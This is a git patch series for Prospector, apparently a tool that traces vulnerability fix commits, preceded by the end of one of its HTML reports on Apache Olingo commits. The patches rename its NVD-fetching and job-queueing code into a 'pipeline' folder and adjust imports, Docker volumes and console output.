    • - - lib/server-api/src/main/java/org/apache/olingo/server/api/serializer/SerializerException.java - - lib/server-core/src/main/java/org/apache/olingo/server/core/uri/UriHelperImpl.java - - lib/server-core/src/main/resources/server-core-exceptions-i18n.properties - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1417]Serach query to support + - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_FILES - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 1df2f4aa67e9ed5c3cc10f3abc65f9e1fd7ee042 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      An advisory keyword is contained in the changed files: server
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1417
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1417]Serach query to support +
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - lib/server-core/src/main/java/org/apache/olingo/server/core/uri/parser/search/SearchTokenizer.java - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1417]OData V4: Adopt search option based on new V4 abnf - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_FILES - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - dfe1dd288c4f706a91b59a620f30c0c60b2ce1d7 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      An advisory keyword is contained in the changed files: server
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1417
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1417]OData V4: Adopt search option based on new V4 abnf
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - lib/server-core/src/main/java/org/apache/olingo/server/core/uri/parser/search/SearchTokenizer.java - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1414] Updated netty-codec to 4.1.43.Final - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - SEC_KEYWORDS_IN_LINKED_BUG - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 356cdbd3d8b95b2aa7bbc7b3114516c3c2eb30ce -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The bug tracking ticket OLINGO-1414 contains some security-related terms: vulnerability
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1414
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1414] Updated netty-codec to 4.1.43.Final
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - pom.xml - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1408] Fix tests - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_FILES - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 636fdde13dda35d9decae1768d9846f04bb355d9 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      An advisory keyword is contained in the changed files: server
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1408
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1408] Fix tests
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - lib/server-tecsvc/src/main/java/org/apache/olingo/server/tecsvc/data/DataCreator.java - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - Merge pull request #59 from artem-smotrakov/better-xml-parsing... - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_MSG - - GITHUB_ISSUE_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 3cf93d5e061bad59b57c7ccd938fad8ba1a187b0 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The commit message and the advisory description contain the following keywords: request
      -
    • - -
    • -
      The commit message references some github issue: 59
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      Merge pull request #59 from artem-smotrakov/better-xml-parsing Better XML parsing
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1407] Updated dependency versions - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_MSG - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - 85d660c6d87e9a45493bc29306bd6d065af8a88e -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The commit message and the advisory description contain the following keywords: version
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1407
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1407] Updated dependency versions
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - pom.xml - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1407] Updated Jackson version - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 6 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - ADV_KEYWORDS_IN_MSG - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - ae416b56094b046a6c9882c67b7fb268b56f1644 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The commit message and the advisory description contain the following keywords: version
      -
    • - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1407
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1407] Updated Jackson version
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - pom.xml - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1406] Added scm link - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 2 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - ba36402dede2b3a9ef5e58a91866567efa9b41f8 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1406
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1406] Added scm link
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - pom.xml - -
    • -
    - - - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - [OLINGO-1408] Minor change to fix tests - -
    -
    -
    - -
    -
    - -
    -
    -
    -
    - -
    - - Relevance: 2 -
    - -
    -
    -
    - - Tag: 4.10.0 -
    -
    -
    -
    -
    - - - - BUG_IN_MESSAGE - - -
    -
    -
    -
    - - - - -
    -
    -
    - ec603917e5cc7bc5c8caf917435ec890b632fd84 -
    -
    - - - - Open commit - -
    -
    Matched rules
    - -
      - -
    • -
      The commit message references some bug tracking ticket: OLINGO-1408
      -
    • - -
    - -
    Commit message
    - -
      -
    • -
      [OLINGO-1408] Minor change to fix tests
      -
    • -
    - -
    Changed files in commit
    - -
      -
    • - - lib/commons-core/src/main/java/org/apache/olingo/commons/core/edm/primitivetype/EdmDateTimeOffset.java - -
    • -
    - - - -
    -
    -
    - -
    -
    -
    -
    -
    - - - - - - - - - - \ No newline at end of file From e76a19aa213007c9bab9f44dd983b7bb03ee188e Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 08:35:44 +0000 Subject: [PATCH 011/130] renames folder with pipeline code to pipeline --- prospector/data_sources/nvd/__init__.py | 0 prospector/data_sources/nvd/job_creation.py | 133 ----------- prospector/data_sources/nvd/nvd_test.py | 23 -- prospector/data_sources/test.csv | 4 - .../{data_sources => pipeline}/__init__.py | 0 .../nvd => pipeline}/filter_entries.py | 46 ++-- prospector/pipeline/job_creation.py | 214 ++++++++++++++++++ prospector/pipeline/main.py | 35 +++ .../version_extraction_test.py | 0 .../nvd => pipeline}/versions_extraction.py | 0 10 files changed, 279 insertions(+), 176 deletions(-) delete mode 100644 prospector/data_sources/nvd/__init__.py delete mode 100644 prospector/data_sources/nvd/job_creation.py delete mode 100644 prospector/data_sources/nvd/nvd_test.py delete mode 100644 prospector/data_sources/test.csv rename prospector/{data_sources => pipeline}/__init__.py (100%) rename prospector/{data_sources/nvd => pipeline}/filter_entries.py (85%) create mode 100644 prospector/pipeline/job_creation.py create mode 100644 prospector/pipeline/main.py rename prospector/{data_sources/nvd => pipeline}/version_extraction_test.py (100%) rename prospector/{data_sources/nvd => pipeline}/versions_extraction.py (100%) diff --git a/prospector/data_sources/nvd/__init__.py b/prospector/data_sources/nvd/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/prospector/data_sources/nvd/job_creation.py b/prospector/data_sources/nvd/job_creation.py deleted file mode 100644 index e5869710c..000000000 --- a/prospector/data_sources/nvd/job_creation.py +++ /dev/null @@ -1,133 +0,0 @@ -import json -import sys -import time -from datetime import datetime - -import redis -import requests -from rq import Connection, Queue, get_current_job - -from backenddb.postgres import PostgresBackendDB -from core.prospector import prospector -from core.report import generate_report -from log.logger import logger -from util.config_parser import parse_config_file - -# get the redis server url and backend from configuration file -config = parse_config_file() -redis_url = config.redis_url -backend = config.backend - - -def run_prospector(vuln_id, repo_url, v_int): - job = get_current_job() - job_id = job.get_id() - url = f"{backend}/jobs/{job_id}" - data = { - "status": job.get_status(), - "started_at": job.started_at.isoformat(), - } - - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - try: - results, advisory_record = prospector( - vulnerability_id=vuln_id, - repository_url=repo_url, - version_interval=v_int, - backend_address=backend, - ) - generate_report( - results, - advisory_record, - "html", - f"data_sources/reports/{vuln_id}_{job_id}", - ) - status = "finished" - results = f"data_sources/reports/{vuln_id}_{job_id}" - except Exception: - status = "failed" - results = None - logger.error("job failed during execution") - finally: - end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") - print(job_id, status, end_time, results) - data = {"status": status, "finished_at": end_time, "results": results} - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - return f"data_sources/reports/{vuln_id}_{job_id}" - - -def create_prospector_job(vuln_id, repo, version, at_front=False): - with Connection(redis.from_url(redis_url)): - queue = Queue(default_timeout=800) - if at_front: - job = queue.enqueue( - run_prospector, args=(vuln_id, repo, version), at_front=True - ) - else: - job = queue.enqueue(run_prospector, args=(vuln_id, repo, version)) - - return job - - -def connect_to_db(): - db = PostgresBackendDB( - config.database.user, - config.database.password, - config.database.host, - config.database.port, - config.database.dbname, - ) - db.connect() - return db - - -async def enqueue_jobs(): - db = connect_to_db() - processed_vulns = db.get_processed_vulns_not_in_job() - print(processed_vulns) - created_by = "Auto" - for processed_vuln in processed_vulns: - pv_id = processed_vuln["_id"] - pv_repository = processed_vuln["repository"] - pv_versions = processed_vuln["versions"] - v_vuln_id = processed_vuln["vuln_id"] - - try: - job = create_prospector_job(v_vuln_id, pv_repository, pv_versions) - except Exception: - logger.error("error while creating automatically the jobs", exc_info=True) - - try: - db.save_job( - job.get_id(), - pv_id, - job.args, - job.created_at, - job.started_at, - job.ended_at, - job.result, - created_by, - job.get_status(refresh=True), - ) - except Exception: - logger.error("error while saving automatically the jobs", exc_info=True) - - db.disconnect() diff --git a/prospector/data_sources/nvd/nvd_test.py b/prospector/data_sources/nvd/nvd_test.py deleted file mode 100644 index a606d03da..000000000 --- a/prospector/data_sources/nvd/nvd_test.py +++ /dev/null @@ -1,23 +0,0 @@ -from data_sources.nvd.filter_entries import process_entries, retrieve_vulns -from data_sources.nvd.job_creation import enqueue_jobs - -# request new cves entries through NVD API and save to db -cves = retrieve_vulns(7) - -"""with open("filtered_cves.json", "w") as outfile: - json.dump(filtered_cves, outfile)""" - -print("retrieved cves") -# print(cves) - -# get entry from db and process -processed_vulns = process_entries() -print("ready to be enqueued: ") -print(processed_vulns) - -# if processed_vulns: -# for entry in processed_vulns: -# job_info = create_prospector_job(entry) -# save_job_to_db(job_info) - -enqueue_jobs() diff --git a/prospector/data_sources/test.csv b/prospector/data_sources/test.csv deleted file mode 100644 index a9ef68144..000000000 --- a/prospector/data_sources/test.csv +++ /dev/null @@ -1,4 +0,0 @@ -project,service_name,repository -Apache,Common fileupload,https://github.com/apache/commons-fileupload -Redis,redis,https://github.com/redis/redis -Flatpak,flatpak,https://github.com/flatpak/flatpak \ No newline at end of file diff --git a/prospector/data_sources/__init__.py b/prospector/pipeline/__init__.py similarity index 100% rename from prospector/data_sources/__init__.py rename to prospector/pipeline/__init__.py diff --git a/prospector/data_sources/nvd/filter_entries.py b/prospector/pipeline/filter_entries.py similarity index 85% rename from prospector/data_sources/nvd/filter_entries.py rename to prospector/pipeline/filter_entries.py index 2ddb4b859..4e38560b8 100644 --- a/prospector/data_sources/nvd/filter_entries.py +++ b/prospector/pipeline/filter_entries.py @@ -11,13 +11,9 @@ from psycopg2.extras import DictCursor, DictRow, Json from backenddb.postgres import PostgresBackendDB -from data_sources.nvd.versions_extraction import ( - extract_version_range, - extract_version_ranges_cpe, - process_versions, -) from datamodel.nlp import extract_products from log.logger import logger +from pipeline.versions_extraction import extract_version_range from util.config_parser import parse_config_file config = parse_config_file() @@ -43,7 +39,18 @@ def disconnect_from_database(db): db.disconnect() -async def retrieve_vulns(d_time): +async def get_cve_data(d_time): + """Obtains the raw CVE data from the NVD database and saves it to the + backend database. + + Params: + d_time: The number of days in the past to take as the starting + time for getting CVEs + + Returns: + JSON data returned by the NVD API + + """ start_date, end_date = get_time_range(d_time) data = "" @@ -65,13 +72,10 @@ async def retrieve_vulns(d_time): "Error while retrieving vulnerabilities from NVD", exc_info=True ) - # save to db - save_vuln_to_db(data) - return data -def save_vuln_to_db(vulns): +def save_cves_to_db(vulns): db = connect_to_db() for vuln in vulns["vulnerabilities"]: vuln_id = vuln["cve"]["id"] @@ -79,7 +83,9 @@ def save_vuln_to_db(vulns): mod_date = vuln["cve"]["lastModified"] raw_record = json.dumps(vuln) source = "NVD" - url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" + url = ( + f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" + ) res = db.lookup_vuln_id(vuln_id, mod_date) if res[0] == 0: @@ -100,13 +106,15 @@ async def get_cve_by_id(id): print("Error while trying to retrieve entry") except aiohttp.ClientError as e: print(str(e)) - logger.error("Error while retrieving vulnerability from NVD", exc_info=True) + logger.error( + "Error while retrieving vulnerability from NVD", exc_info=True + ) return data async def add_single_cve(vuln_id: str): raw_json_cve = get_cve_by_id(vuln_id) - save_vuln_to_db(raw_json_cve) + save_cves_to_db(raw_json_cve) def write_list_to_file(lst, filename): @@ -124,7 +132,11 @@ def csv_to_json(csv_file_path): # Loop through the rows of the file for row in csv_reader: # Create a dictionary for the row data - row_data = {"project": row[0], "service_name": row[1], "repository": row[2]} + row_data = { + "project": row[0], + "service_name": row[1], + "repository": row[2], + } data.append(row_data) # Convert to JSON object json_data = json.dumps(data) @@ -141,7 +153,7 @@ def get_time_range(d_time): return start_date, end_date -async def process_entries(): +async def process_cve_data(): # start_date,end_date=get_time_range(d_time) db = connect_to_db() @@ -158,7 +170,9 @@ async def process_entries(): if processed_vuln is not None: processed_vulns.append(processed_vuln) db.save_processed_vuln( - entry_id, processed_vuln["repo_url"], processed_vuln["version_interval"] + entry_id, + processed_vuln["repo_url"], + processed_vuln["version_interval"], ) db.disconnect() return processed_vulns diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py new file mode 100644 index 000000000..75a4520f2 --- /dev/null +++ b/prospector/pipeline/job_creation.py @@ -0,0 +1,214 @@ +import json +import sys +import time +from datetime import datetime +from typing import Optional + +import redis +import requests +from rq import Connection, Queue, get_current_job + +from backenddb.postgres import PostgresBackendDB +from cli.console import ConsoleWriter +from core.prospector import prospector +from core.report import generate_report +from llm.llm_service import LLMService +from log.logger import logger +from util.config_parser import parse_config_file + +# get the redis server url and backend from configuration file +config = parse_config_file() +redis_url = config.redis_url +backend = config.backend + + +def create_prospector_job( + vuln_id: str, + repo: Optional[str], + version: str, + report_filepath: str, + at_front=False, +): + """Creates a job with the Prospector function for the given vulnerability, + optionally at the front of the queue. + + Params: + vuln_id (str): The ID of the CVE. + repo (str): The URL of the affected repository. + version (str): The extracted version interval. + reports_filepath (str): The filepath where the report will be saved. + at_front (bool): Enqueue job at the front of the queue. + + Returns: The object of the created job. + """ + + with Connection(redis.from_url(redis_url)): + queue = Queue(default_timeout=800) + if at_front: + job = queue.enqueue( + _run_prospector, + args=(vuln_id, repo, version, report_filepath), + at_front=True, + ) + else: + job = queue.enqueue( + _run_prospector, args=(vuln_id, repo, version, report_filepath) + ) + + return job + + +def _run_prospector( + cve_id: str, + repository_url: Optional[str], + version_interval: str, + report_filepath: str, +): + """Call the prospector() and generate_report() functions. This also creates + the LLMService singleton so that it is available in the context of the job. + + Returns: The filepath of the created report on the host. + """ + + job = get_current_job() + job_id = job.get_id() + + url = f"{backend}/jobs/{job_id}" + data = { + "status": job.get_status(), + "started_at": job.started_at.isoformat(), + } + + # Update the database with the new job status + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + params = { + "vulnerability_id": cve_id, + "repository_url": repository_url, + "version_interval": version_interval, + "use_backend": config.use_backend, + "backend_address": config.backend, + "git_cache": config.git_cache, + "limit_candidates": config.max_candidates, + "use_llm_repository_url": config.use_llm_repository_url, + "enabled_rules": config.enabled_rules, + } + + if config.llm_service.use_llm_repository_url: + try: + LLMService(config.llm_service) + except Exception as e: + logger.error(f"LLM Service could not be instantiated: {e}") + raise e + + # Execute the Prospector function + try: + results, advisory_record = prospector(**params) + + generate_report( + results, + advisory_record, + "html", + f"{report_filepath}{cve_id}_{job_id}", + ) + status = "finished" + results = (f"{report_filepath}{cve_id}_{job_id}",) + + except Exception as e: + status = "failed" + results = None + logger.error(f"Job {cve_id} failed during execution: {e}") + + finally: + end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") + + ConsoleWriter.print( + f"{job_id} {status} at {end_time}. Report saved in {results}" + ) + + # Update job in database + data = {"status": status, "finished_at": end_time, "results": results} + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + return (f"{report_filepath}{cve_id}_{job_id}",) + + +def connect_to_db(): + db = PostgresBackendDB( + config.database.user, + config.database.password, + config.database.host, + config.database.port, + config.database.dbname, + ) + db.connect() + return db + + +async def enqueue_jobs(reports_filepath: str, creator: str = "Auto"): + """Creates jobs for each processed vulnerability that has not yet been + processed. + + Params: + creator (str): The creator of the jobs, eg. Auto + + """ + db = connect_to_db() + processed_cves = db.get_processed_vulns_not_in_job() + + print( + f"Enqueueing {len(processed_cves)} jobs for {[cve_entry['vuln_id'] for cve_entry in processed_cves]}" + ) + print(processed_cves) + + for processed_vuln in processed_cves: + pv_id = processed_vuln["_id"] + pv_repository = processed_vuln["repository"] + pv_versions = processed_vuln["versions"] + v_vuln_id = processed_vuln["vuln_id"] + + try: + job = create_prospector_job( + v_vuln_id, pv_repository, pv_versions, reports_filepath + ) + except Exception: + logger.error( + "Error when creating jobs for processed vulnerabilities", + exc_info=True, + ) + + try: + db.save_job( + job.get_id(), + pv_id, + job.args, + job.created_at, + job.started_at, + job.ended_at, + job.result, + creator, + job.get_status(refresh=True), + ) + except Exception: + logger.error( + "Error when saving the created job to the database.", + exc_info=True, + ) + + db.disconnect() diff --git a/prospector/pipeline/main.py b/prospector/pipeline/main.py new file mode 100644 index 000000000..6aab0d9c7 --- /dev/null +++ b/prospector/pipeline/main.py @@ -0,0 +1,35 @@ +import asyncio +from pipeline.filter_entries import ( + get_cve_data, + process_cve_data, + save_cves_to_db, +) +from pipeline.job_creation import enqueue_jobs + + +DAYS_AGO = 10 # Time period from DAYS_AGO to now to retrieve CVEs from NVD + + +async def dispatch_jobs(): + """Gets CVEs from the last X days, filters them and enqueues them in the + Queue. Workers fetch the jobs and execute the Prospector function on them. + """ + # Retrieve the CVE data + cve_data = await get_cve_data(DAYS_AGO) + + # Save data to the vulnerabilities table in the database + save_cves_to_db(cve_data) + + # get entry from db and process + processed_cves = await process_cve_data() + + await enqueue_jobs(reports_filepath="pipeline/reports/") + + +async def main(): + """Starting point to enqueue jobs into the pipeline""" + await dispatch_jobs() + + +if __name__ == "__main__": + asyncio.run(main()) diff --git a/prospector/data_sources/nvd/version_extraction_test.py b/prospector/pipeline/version_extraction_test.py similarity index 100% rename from prospector/data_sources/nvd/version_extraction_test.py rename to prospector/pipeline/version_extraction_test.py diff --git a/prospector/data_sources/nvd/versions_extraction.py b/prospector/pipeline/versions_extraction.py similarity index 100% rename from prospector/data_sources/nvd/versions_extraction.py rename to prospector/pipeline/versions_extraction.py From 3ed03ed6c9a1c4d21d1aa7cc1a68a90c376a98c5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 08:36:35 +0000 Subject: [PATCH 012/130] comments out cluttering print statement --- prospector/backenddb/postgres.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/backenddb/postgres.py b/prospector/backenddb/postgres.py index 1d87b34f9..4a6bb9c5c 100644 --- a/prospector/backenddb/postgres.py +++ b/prospector/backenddb/postgres.py @@ -68,7 +68,7 @@ def connect(self): def disconnect(self): if self.connection: self.connection.close() - print("Disconnected from the database") + # print("Disconnected from the database") # Sanity check self.connection = None else: print("No active database connection") From 2870cf325d2ad1b6368e59e01f6c1dd882a4e0a6 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 08:37:04 +0000 Subject: [PATCH 013/130] adds the pipeline folder as a volume --- prospector/docker-compose.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 835f72ab3..14f50fcdf 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -28,7 +28,7 @@ services: context: . dockerfile: docker/worker/Dockerfile volumes: - - ./data_sources/reports:/app/data_sources/reports + - ./pipeline/reports:/app/pipeline/reports depends_on: - redis environment: From 98074ffabd9f46bc7c39131ff2df2e433eeca5e7 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 08:37:54 +0000 Subject: [PATCH 014/130] adds the full code folder as a volume to the worker container --- prospector/docker-compose.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 14f50fcdf..123bdf5df 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -28,7 +28,8 @@ services: context: . dockerfile: docker/worker/Dockerfile volumes: - - ./pipeline/reports:/app/pipeline/reports + - ./app:/app + # - ./pipeline/reports:/app/pipeline/reports depends_on: - redis environment: From 53d53a202262722bd4cc613f0789825d71c5311c Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 08:55:12 +0000 Subject: [PATCH 015/130] adjusts import paths after renaming folder to pipeline --- prospector/service/api/routers/endpoints.py | 4 ++-- prospector/service/api/routers/feeds.py | 6 ++++-- prospector/service/api/routers/home.py | 13 ++++-------- prospector/service/api/routers/jobs.py | 23 ++++++++------------- prospector/service/api/routers/users.py | 8 +++++-- 5 files changed, 25 insertions(+), 29 deletions(-) diff --git a/prospector/service/api/routers/endpoints.py b/prospector/service/api/routers/endpoints.py index 52e035960..cabf275c2 100644 --- a/prospector/service/api/routers/endpoints.py +++ b/prospector/service/api/routers/endpoints.py @@ -11,7 +11,7 @@ from rq.job import Job from starlette.responses import RedirectResponse -from data_sources.nvd.job_creation import run_prospector +from pipeline.job_creation import _run_prospector from util.config_parser import parse_config_file # from core.report import generate_report @@ -130,7 +130,7 @@ async def enqueue_job(cve: str, repo: str, version: str): with Connection(redis.from_url(redis_url)): queue = Queue() job = Job.create( - run_prospector, + _run_prospector, args=(cve, repo, version), description="prospector", id=cve, diff --git a/prospector/service/api/routers/feeds.py b/prospector/service/api/routers/feeds.py index 5d18a6831..e8c43238b 100644 --- a/prospector/service/api/routers/feeds.py +++ b/prospector/service/api/routers/feeds.py @@ -7,8 +7,8 @@ from starlette.responses import RedirectResponse from backenddb.postgres import PostgresBackendDB -from data_sources.nvd import filter_entries, job_creation from log.logger import logger +from pipeline import filter_entries, job_creation from util.config_parser import parse_config_file router = APIRouter( @@ -92,7 +92,9 @@ async def get_vulns(d_time: int): await filter_entries.retrieve_vulns(d_time) response_object = {"message": "success"} except Exception: - response_object = {"message": "error while retrieving new vulnerabilities"} + response_object = { + "message": "error while retrieving new vulnerabilities" + } return response_object diff --git a/prospector/service/api/routers/home.py b/prospector/service/api/routers/home.py index c74ef8168..cb1f8a34a 100644 --- a/prospector/service/api/routers/home.py +++ b/prospector/service/api/routers/home.py @@ -1,15 +1,9 @@ -import time - -from api.rq_utils import queue, get_all_jobs -import redis -from fastapi import APIRouter, FastAPI, Request +from fastapi import APIRouter, Request from fastapi.responses import HTMLResponse from fastapi.templating import Jinja2Templates -from rq import Connection, Queue -from rq.job import Job -from starlette.responses import RedirectResponse from util.config_parser import parse_config_file +from service.api.routers.jobs import connect_to_db # from core.report import generate_report @@ -26,7 +20,8 @@ # endpoint for monitoring all job status @router.get("/home", response_class=HTMLResponse) async def home(request: Request): - joblist = get_all_jobs() + db = connect_to_db() + joblist = db.get_all_jobs() return templates.TemplateResponse( "index.html", {"request": request, "joblist": joblist} ) diff --git a/prospector/service/api/routers/jobs.py b/prospector/service/api/routers/jobs.py index d8767db6e..a080dfbd5 100644 --- a/prospector/service/api/routers/jobs.py +++ b/prospector/service/api/routers/jobs.py @@ -1,20 +1,11 @@ -import redis -from fastapi import APIRouter, FastAPI, HTTPException, Request -from fastapi.responses import HTMLResponse +from fastapi import APIRouter from fastapi.templating import Jinja2Templates from pydantic import BaseModel -from rq import Connection, Queue -from rq.job import Job from backenddb.postgres import PostgresBackendDB -from data_sources.nvd.filter_entries import add_single_cve, process_entries -from data_sources.nvd.job_creation import ( - create_prospector_job, - enqueue_jobs, - run_prospector, -) from log.logger import logger -from service.api.routers.nvd_feed_update import main +from pipeline.filter_entries import add_single_cve, process_cve_data +from pipeline.job_creation import create_prospector_job, enqueue_jobs from util.config_parser import parse_config_file config = parse_config_file() @@ -96,11 +87,15 @@ async def enqueue(job: DbJob): # If the user pass only the vuln-id, make an API request to the NVD retrieving the info if job.repo is None or job.version is None: add_single_cve(job.vuln_id) - process_entries() + process_cve_data() enqueue_jobs() else: # all job info in request body, enqueue job with priority and save to db rq_job = create_prospector_job( - job.vuln_id, job.repo, job.version, at_front=True + job.vuln_id, + job.repo, + job.version, + report_filepath="pipeline/reports/", + at_front=True, ) logger.info("saving manual job in db", exc_info=True) db.save_manual_job( diff --git a/prospector/service/api/routers/users.py b/prospector/service/api/routers/users.py index a5a3c184e..89f9697c8 100644 --- a/prospector/service/api/routers/users.py +++ b/prospector/service/api/routers/users.py @@ -25,11 +25,15 @@ async def login(form_data: OAuth2PasswordRequestForm = Depends()): user_dict = fake_users_db.get(form_data.username) if not user_dict: - raise HTTPException(status_code=400, detail="Incorrect username or password") + raise HTTPException( + status_code=400, detail="Incorrect username or password" + ) user = UserInDB(**user_dict) hashed_password = fake_hash_password(form_data.password) if not hashed_password == user.hashed_password: - raise HTTPException(status_code=400, detail="Incorrect username or password") + raise HTTPException( + status_code=400, detail="Incorrect username or password" + ) return {"access_token": user.username, "token_type": "bearer"} From a409c1241d1596d076ce0cfd7c43dab76a064077 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 09:21:47 +0000 Subject: [PATCH 016/130] adds console output for steps of pipeline --- prospector/pipeline/filter_entries.py | 139 +++++++++++++++----------- prospector/pipeline/job_creation.py | 90 +++++++++-------- prospector/pipeline/main.py | 4 +- 3 files changed, 134 insertions(+), 99 deletions(-) diff --git a/prospector/pipeline/filter_entries.py b/prospector/pipeline/filter_entries.py index 4e38560b8..56b8c51d6 100644 --- a/prospector/pipeline/filter_entries.py +++ b/prospector/pipeline/filter_entries.py @@ -11,6 +11,7 @@ from psycopg2.extras import DictCursor, DictRow, Json from backenddb.postgres import PostgresBackendDB +from cli.console import ConsoleWriter, MessageStatus # noqa: E402 from datamodel.nlp import extract_products from log.logger import logger from pipeline.versions_extraction import extract_version_range @@ -51,47 +52,65 @@ async def get_cve_data(d_time): JSON data returned by the NVD API """ - start_date, end_date = get_time_range(d_time) + with ConsoleWriter("Obtaining CVE data from NVD API") as console: + start_date, end_date = get_time_range(d_time) + + data = "" + # Set up the URL to retrieve the latest 